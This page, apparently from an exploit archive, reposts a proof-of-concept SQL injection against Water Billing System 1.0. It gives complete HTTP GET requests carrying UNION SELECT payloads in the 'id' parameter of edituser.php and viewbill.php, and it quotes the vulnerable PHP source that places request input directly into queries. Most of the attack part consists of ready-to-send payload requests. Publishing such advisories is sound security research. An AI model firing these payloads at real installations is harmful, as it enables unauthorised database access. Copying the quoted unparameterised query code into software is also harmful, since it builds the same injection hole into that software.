Registerwater billing system 1.0 id sql injection (authenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated) # Date: 2020-11-14 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: Apache2 and Windows 10 Vulnerable param: id ------------------------------------------------------------------------- GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/WBS/user.php Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean ------------------------------------------------------------------------- Source Code: edituser.php .. .. .. $user_id =$_REQUEST['id']; $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'"); .. .. ------------------------------- Vulnerable param: id ------------------------------------------------------------------------- GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Cookie: COOKIE Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------- Source Code: \WBS\viewbill.php .. .. .. $id =$_REQUEST['id']; $result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); .. .. -------------------------------
Water billing system 1.0 id sql injection (authenticated) Vulnerability / Exploit Source : Water billing system 1.0 id sql injection (authenticated)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes